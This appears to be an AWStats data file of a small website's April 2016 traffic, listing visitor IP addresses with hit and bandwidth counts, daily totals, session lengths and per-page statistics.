49.207.186.243 9 73 15944674 20160417045044
70.39.157.197 1 1 70301 20160414120619
220.181.51.40 1 1 70301 20160421231526
66.220.145.149 0 2 888159 
101.63.171.236 9 64 6803273 20160406114902
74.91.18.42 1 1 70301 20160404130056
14.141.214.242 8 68 17728647 20160425020910
85.214.28.229 2 2 140602 20160406024826
78.110.65.156 4 20 3367434 20160411142409
116.72.19.46 7 63 15665983 20160416021615
195.154.33.129 1 1 70301 20160427034643
104.128.144.131 1 1 68132 20160420002954
69.197.185.19 2 2 140602 20160418111133
122.164.142.18 6 67 17317000 20160416022625
66.249.80.121 2 2 140602 20160419115513
171.51.148.78 5 31 8052483 20160404021102
66.102.6.88 0 34 5041502 
183.83.50.186 6 62 15632642 20160426001452
66.220.145.155 0 3 338045 
179.235.166.231 1 11 3172858 20160404180321
173.252.74.109 0 1 173876 
120.56.96.144 5 39 3324835 20160429023755
139.129.18.107 2 2 140602 20160418053901
123.59.59.52 4 4 281204 20160425191332
104.130.230.54 1 1 70301 20160406200212
14.96.59.229 1 7 292568 20160426082301
117.223.145.7 0 1 985493 
122.178.100.90 7 61 13286393 20160403010052
5.166.123.150 0 1 161280 
66.102.7.162 1 1 70301 20160402075601
198.54.90.200 1 1 70301 20160401042004
223.176.150.128 7 52 14016130 20160426053006
49.207.186.110 1 1 13916 20160426044545
173.208.197.251 2 2 140602 20160424142550
122.174.169.87 1 21 767072 20160430125546
64.233.173.22 3 18 4864140 20160423075640
107.150.32.62 2 2 140602 20160409133759
179.34.32.249 1 25 4476917 20160406112437
66.102.6.82 1 42 8632369 20160430000501
122.174.19.67 6 51 13945829 20160421084902
13.90.208.199 7 7 372369 20160408183356
31.13.105.118 0 1 173876 
61.12.88.126 0 1 169610 
173.252.102.115 0 2 349360 
107.150.32.58 1 1 70301 20160422105927
166.70.71.122 0 1 116939 
62.212.73.49 1 1 70301 20160405070018
223.30.45.187 13 139 29980351 20160406052404
54.233.148.233 2 2 64942 20160404140538
85.214.245.199 1 1 72187 20160429135304
117.193.175.156 8 71 16781510 20160426033231
173.252.102.113 0 2 292636 
106.207.234.69 8 129 27566237 20160418033228
116.202.99.34 0 1 139373 
122.174.28.244 6 50 12533904 20160423011716
157.55.39.135 0 5 303565 
92.52.226.120 3 3 140602 20160410002316
66.249.80.113 2 2 140602 20160415055249
174.127.133.26 1 2 104781 20160407162938
104.236.114.5 6 6 372369 20160417050032
23.101.61.176 1 1 72187 20160415151659
203.171.211.144 0 1 154325 
117.201.5.104 4 20 3898253 20160408234142
64.233.173.27 2 18 3923022 20160423075640
173.252.102.119 0 4 1451376 
122.165.96.90 11 134 29663614 20160407053049
115.242.244.124 10 93 15557484 20160425102957
49.202.8.54 2 2 140602 20160426083143
186.220.198.147 5 49 12226144 20160405182248
187.79.46.128 1 26 6155006 20160404170301
141.212.122.209 3 3 210903 20160415155301
117.241.158.1 7 48 13333475 20160427071141
223.235.174.86 6 62 15328426 20160406062708
1.39.20.153 12 76 17558071 20160426052926
117.207.70.93 10 122 26340526 20160408010438
173.252.102.116 0 2 1168780 
122.170.78.163 0 1 137695 
94.26.140.150 1 1 70301 20160421211015
141.212.122.193 2 2 140602 20160405031339
49.249.11.23 5 33 8829631 20160425114247
106.208.232.36 9 54 5156651 20160406060833
112.133.232.18 5 50 14147293 20160411050748
209.159.137.59 1 1 70301 20160407221622
174.127.133.62 1 4 443254 20160407164319
106.208.162.15 8 52 11930217 20160418014411
66.249.84.100 1 1 70301 20160403011800
122.174.18.191 10 77 20139703 20160405044703
106.76.53.104 5 50 13843077 20160417012017
36.255.18.215 1 16 5176132 20160422002439
92.103.168.50 2 2 140602 20160411134951
73.157.93.235 1 1 70301 20160425035459
66.220.145.152 0 1 240772 
122.165.104.11 6 104 22856474 20160407075157
64.233.173.17 0 16 5364565 
46.28.68.158 1 1 70301 20160412223629
101.222.224.170 0 3 2643452 
122.164.117.47 6 45 10198004 20160406032029
150.70.188.167 0 2 10761 
66.249.84.197 1 1 70301 20160417092543
182.65.70.15 8 59 16329390 20160407022740
74.91.17.181 1 1 70301 20160420154759
181.30.30.166 1 1 70301 20160415110607
117.218.74.3 10 87 21056330 20160402015201
174.127.133.27 1 1 2830 20160407171425
182.65.73.225 5 5 408532 20160407065853
211.6.121.141 1 1 70301 20160426111750
150.70.188.171 0 2 100110 
94.200.33.146 0 1 1678089 
122.178.188.176 12 133 27822565 20160407063030
173.252.74.103 0 1 173876 
49.249.0.115 2 2 140602 20160428001017
117.193.184.21 7 105 22926775 20160423220946
110.227.227.167 13 150 13785666 20160428152038
13.92.181.231 7 7 391082 20160430101340
49.207.191.142 4 33 5407466 20160429030034
208.184.112.74 1 1 21584 20160406095201
104.236.91.249 6 6 372369 20160426005313
191.249.156.110 1 7 230010 20160407133337
74.91.17.182 1 1 70301 20160406180635
14.139.162.2 0 1 192163 
141.212.122.161 3 3 210903 20160428052609
182.65.97.149 8 101 22301723 20160406102844
45.121.103.158 1 13 738525 20160426044230
69.30.202.227 1 1 70301 20160423160700
223.185.157.91 11 177 22655873 20160412113548
91.239.68.41 1 1 70301 20160415045621
182.65.81.124 12 116 11855407 20160428035954
66.102.8.254 3 17 2328184 20160424204829
185.56.82.99 1 1 70301 20160402001148
104.131.165.123 2 2 140602 20160421211014
213.184.230.126 3 24 5709512 20160405024727
74.142.144.19 1 1 70301 20160414235820
223.190.140.194 1 8 296318 20160429081634
212.252.164.126 0 1 192351 
74.91.17.179 1 1 70301 20160410080059
117.213.75.130 8 70 15713722 20160404111931
54.153.32.246 5 5 351505 20160411202727
69.58.178.58 7 7 442670 20160402085737
49.203.119.120 2 2 140602 20160426001623
66.249.80.40 1 1 70301 20160406110210
173.252.102.114 0 1 397009 
223.176.149.132 2 2 70301 20160415114542
182.65.235.90 5 37 9662644 20160404065306
101.63.185.13 10 67 12835427 20160406114604
122.174.141.226 8 73 15805493 20160423092240
190.146.183.11 5 48 12101495 20160408201018
103.35.212.63 0 1 158953 
104.131.115.133 6 6 372369 20160408193639
27.107.223.250 2 2 140602 20160428061549
208.184.112.75 0 11 193379 
14.99.143.105 0 6 978975 
173.252.95.21 0 1 173876 
203.199.204.198 10 98 21446132 20160423004319
49.15.95.119 5 50 13843077 20160405093302
66.220.156.97 1 1 70301 20160408234126
106.208.54.104 2 8 3315388 20160404092503
223.191.35.42 5 50 13843077 20160409063842
66.249.84.165 1 1 70301 20160404224308
106.51.127.221 7 52 14287895 20160419021906
107.150.46.37 2 2 140602 20160410031343
117.206.114.58 6 78 9440064 20160430134004
117.207.118.176 5 50 14147293 20160403000357
122.174.53.110 10 56 9881910 20160428043407
173.252.74.112 0 1 173876 
174.127.188.37 1 1 70301 20160407141314
202.88.236.45 9 43 7661575 20160408233000
5.149.254.109 1 1 70301 20160419184811
74.91.20.195 1 1 70301 20160401121703
59.96.237.211 0 2 941907 
174.127.133.21 1 1 70301 20160407151607
122.178.143.23 5 50 14147293 20160418053410
78.110.65.136 5 24 2416320 20160411142415
107.167.108.14 3 106 21410844 20160413143112
106.208.86.236 6 70 17210119 20160425122728
144.168.45.117 1 1 391 20160417190403
106.208.45.116 6 103 22551582 20160426120059
14.102.43.2 8 53 14245052 20160401091350
117.216.60.121 0 1 985493 
52.63.215.170 1 1 70301 20160412223629
49.203.13.124 2 2 144374 20160430180406
125.23.196.78 7 51 11112821 20160405072843
183.83.49.77 4 5 144974 20160428074057
66.220.145.150 0 1 169610 
179.108.188.130 1 25 5321429 20160407224833
219.65.100.98 7 121 27192946 20160425021216
208.100.26.231 1 1 0 20160418223117
66.102.7.176 2 2 140602 20160404112029
173.252.74.110 0 1 173876 
124.104.241.183 5 50 12717999 20160425051128
92.243.29.148 1 1 38883 20160429141352
95.154.24.73 1 1 70301 20160421211020
182.71.145.58 0 1 169610 
92.96.199.168 0 2 336967 
1.23.73.40 9 55 10821654 20160427232149
116.74.108.180 6 62 15632642 20160406052150
104.250.159.218 6 23 1084457 20160417195413
185.112.102.170 1 1 0 20160405025253
49.203.68.168 2 2 140602 20160427112902
122.165.107.139 7 51 12510536 20160421055642
45.58.38.196 1 1 70301 20160425155114
150.70.188.176 0 1 7521 
169.54.233.116 1 1 70301 20160421021721
177.135.178.242 2 16 2314381 20160404180321
167.114.209.28 8 8 535456 20160428201222
117.193.47.124 7 72 18796513 20160421080757
66.102.8.128 2 16 6462109 20160424204829
207.46.13.185 0 4 166313 
80.14.151.35 1 1 70301 20160407230731
125.63.112.6 7 67 16943005 20160407162055
211.0.154.127 1 1 72187 20160428111740
223.187.9.226 11 131 27663320 20160418061019
37.106.135.139 6 44 10029687 20160423052034
211.0.145.110 1 1 70301 20160426171834
66.220.145.153 0 4 470218 
180.151.136.62 1 2 77822 20160423230812
69.30.226.98 1 1 70301 20160420172121
92.222.103.234 1 1 70301 20160408002328
174.127.133.31 0 2 4024 
122.172.144.102 8 64 15769882 20160406040051
106.208.158.132 0 4 172171 
66.249.84.252 1 1 70301 20160412035324
106.215.175.190 8 72 3860884 20160403011144
209.159.138.19 1 1 70301 20160421211015
38.100.21.67 5 11 487962 20160416121604
176.10.99.207 1 1 70301 20160408031135
106.208.219.75 9 137 30883969 20160412075635
189.63.107.231 1 15 691053 20160406210218
113.240.250.156 1 1 70301 20160413143701
45.55.133.234 1 11 492828 20160418174619
182.75.79.58 7 51 12606444 20160404063247
106.208.74.191 6 30 5709115 20160404071710
204.12.196.238 1 1 70301 20160412140725
49.15.217.32 1 1 70301 20160406090625
66.220.145.148 0 2 292966 
27.153.211.142 2 2 140602 20160419150924
122.164.210.49 7 63 15702943 20160412065447
77.31.84.4 1 25 4476917 20160401170442
174.127.133.30 2 2 107121 20160407172704
107.150.3.60 2 2 140602 20160408091639
216.69.191.97 1 1 70301 20160405133406
173.252.102.117 0 2 660994 
211.220.63.148 1 1 391 20160426223729
59.145.139.164 9 76 17540685 20160426013733
85.143.218.48 3 3 210903 20160404083739
156.168.140.42 1 44 13213307 20160404062951
122.174.39.174 6 35 6792347 20160406023413
174.127.133.61 0 3 44610 
106.206.12.75 5 52 13859828 20160417072220
106.208.229.53 1 9 276407 20160412030357
76.23.159.129 6 70 6077890 20160428201636
106.51.16.205 0 1 119466 
74.91.18.43 1 1 70301 20160424155027
76.71.75.81 0 1 167142 
202.78.154.157 5 49 12226144 20160412014654
94.125.95.28 1 1 70301 20160422004856
66.249.84.166 1 1 70301 20160405115851
123.236.193.28 0 2 90578 
182.118.54.64 1 1 72187 20160430122945
112.133.246.128 1 32 7204799 20160411212132
223.235.169.129 9 70 17493962 20160402024742
180.151.63.66 11 112 29779935 20160416014600
193.90.12.87 1 1 70301 20160412223544
27.59.6.10 5 37 9973391 20160412130736
204.13.201.137 1 1 30401 20160421210508
150.70.173.58 1 1 70301 20160421213343
27.59.191.47 14 206 13844739 20160416082005
69.197.185.22 1 1 70301 20160407180012
117.216.8.192 6 38 10773873 20160404060453
216.163.188.240 1 1 70301 20160406043513
5.206.88.106 1 1 70301 20160426053341
106.208.225.61 1 18 3172482 20160425015542
4.79.123.3 1 1 70301 20160414120618
201.86.193.118 1 1 70301 20160405001207
189.84.21.44 1 1 70301 20160412223630
104.209.188.207 1 1 72187 20160416023629
180.215.121.82 6 43 9538537 20160422035645
46.183.218.199 1 1 70301 20160427185608
114.69.235.169 0 1 154325 
103.193.22.7 6 62 15632642 20160402123231
171.76.128.113 14 118 17987619 20160426003046
158.130.0.242 1 1 70301 20160412223629
91.121.83.118 2 2 64331 20160422063113
109.163.234.5 1 1 70301 20160421210925
182.73.123.142 0 1 154325 
27.107.152.236 8 8 562408 20160426064642
66.102.6.85 1 30 5237627 20160420142741
59.97.52.225 8 103 28188946 20160402035012
1.39.61.20 6 51 13945829 20160407214349
157.55.39.8 0 1 6841 
202.85.197.9 1 1 70301 20160416141635
54.183.191.109 1 1 70301 20160402211603
49.249.143.195 2 2 140602 20160426122138
174.127.133.29 3 9 334187 20160407171317
122.164.204.109 7 45 10063028 20160403111358
37.9.41.202 1 1 72187 20160428160531
200.216.235.58 1 25 4476917 20160411103132
173.252.74.99 1 1 70301 20160424115230
14.99.174.20 9 51 12529262 20160426004510
89.187.142.208 1 1 70301 20160408091921
171.76.211.22 9 64 15774728 20160420122904
14.99.127.72 6 47 10824728 20160403090725
198.50.145.72 1 1 70301 20160421211015
107.150.32.59 3 3 210903 20160424150407
95.218.144.63 9 137 16392042 20160428160918
45.55.133.251 1 11 492828 20160408225911
66.220.145.151 0 1 214641 
158.116.203.1 5 50 14147293 20160404190516
END_VISITOR

# Date - Pages - Hits - Bandwidth - Visits
BEGIN_DAY 30
20160401 68 569 107193374 12
20160402 62 476 99472068 11
20160403 34 281 52371019 6
20160404 85 698 167960998 23
20160405 59 426 104095901 15
20160406 124 1034 204347973 29
20160407 72 616 135197208 21
20160408 56 338 71676768 16
20160409 26 226 55795836 7
20160410 33 211 18254555 8
20160411 29 222 51640055 11
20160412 224 2634 426472936 23
20160413 33 469 110838947 8
20160414 28 159 30375746 6
20160415 96 1024 193589728 9
20160416 146 1706 268107935 10
20160417 35 208 45315699 9
20160418 60 605 123724367 14
20160419 16 63 15534260 6
20160420 33 312 62250851 10
20160421 64 469 99735908 20
20160422 13 65 14947600 8
20160423 66 699 156823206 13
20160424 24 193 46396872 10
20160425 69 672 155996563 14
20160426 136 1105 201005647 30
20160427 41 241 53091054 9
20160428 215 2498 215201147 19
20160429 84 553 50501775 9
20160430 76 663 60464473 9
END_DAY

# Session range - Number of visits
BEGIN_SESSION 7
1h+ 7
5mn-15mn 19
30s-2mn 45
15mn-30mn 10
2mn-5mn 36
0s-30s 271
30mn-1h 7
END_SESSION

# URL - Pages - Bandwidth - Entry - Exit
# The 10 first Pages must be first (order not required for others)
BEGIN_SIDER 54
/ 426 28985593 343 198
/fonts/Rounded%20Elegance.ttf 165 24322320 2 13
/fonts/helvetica/Helvetica.woff2 126 1410360 1 4
/contact.php 125 4276279 2 37
/fonts/pacifico/Pacifico.woff2 121 2723160 1 19
/fonts/glyphicons-halflings-regular.woff2 113 1983080 0 2
/domestic.php 91 5421228 4 21
/international.php 85 8921098 3 21
/index.php 71 5053609 0 11
/dev/international.php 71 6750658 0 3
/dev/fonts/pacifico/Pacifico.woff 6 634176 0 0
http://www.elong.com/ 1 70301 1 1
/dev/fonts/helvetica/Helvetica-Bold.woff 8 206928 0 0
/fonts/helvetica/Helvetica.woff 33 428156 1 0
/dev/contact.php 20 716730 0 1
http://env.darkbyte.ru/ 1 70301 1 1
/dev/about_us.php 12 426124 0 0
/dev/fonts/Rounded%20Elegance.ttf 44 6902280 0 1
/dev/fonts/pacifico/Pacifico.woff2 33 792192 0 3
/fonts/helvetica/Helvetica-Bold.eot 7 144100 0 0
/googlef32d9fa0f64cf5c4.html 1 53 1 1
/fonts/pacifico/Pacifico.ttf 8 349056 0 4
/dev/mail.php 16 1550 1 1
http://www.qyer.com/ 2 140602 2 2
/dev/fonts/glyphicons-halflings-regular.woff 6 117120 0 0
/fonts/helvetica/Helvetica.ttf 6 163008 1 0
/dev/fonts/helvetica/Helvetica.woff2 39 453768 0 0
http://www.qunar.com/ 2 140602 2 2
/fonts/glyphicons-halflings-regular.woff 31 632448 1 1
/dev/domestic.php 31 1831114 1 4
/dev/fonts/glyphicons-halflings-regular.woff2 35 576896 0 1
/fonts/pacifico/Pacifico.eot 7 219100 0 1
/about_us.php 56 1958180 2 14
/fonts/glyphicons-halflings-regular.ttf 6 272424 0 1
/fonts/helvetica/Helvetica.eot 8 119120 0 1
/fonts/glyphicons-halflings-regular.eot 8 100635 0 0
/fonts/pacifico/Pacifico.woff 35 3276576 0 7
/dev/fonts/helvetica/Helvetica.woff 6 73820 0 0
/dev/fonts/helvetica/Helvetica-Light.woff2 24 268320 0 0
/dev/fonts/helvetica/Helvetica-Bold.woff2 24 723648 0 1
/js/ 2 5660 2 1
/dev/fonts/pacifico/Pacifico.ttf 1 43632 0 0
/fonts/helvetica/Helvetica-Bold.woff2 24 693496 0 0
/dev/fonts/helvetica/Helvetica-Light.woff 8 69580 0 1
/fonts/helvetica/Helvetica-Light.woff2 25 268320 0 2
/dev/ 47 3392831 17 2
/cgi-bin/test-cgi 3 1173 3 3
/domestic.php/images/maodal-bg.pngf 1 59348 0 1
/dev/index.php 19 1371577 0 0
/fonts/helvetica/Helvetica-Bold.woff 14 482832 0 1
/fonts/helvetica/Helvetica-Light.woff 30 375732 1 4
/fonts/helvetica/Helvetica-Light.eot 7 111500 0 0
http://www.mafengwo.cn/ 2 140602 2 2
/mail.php 14 718 0 1
END_SIDER
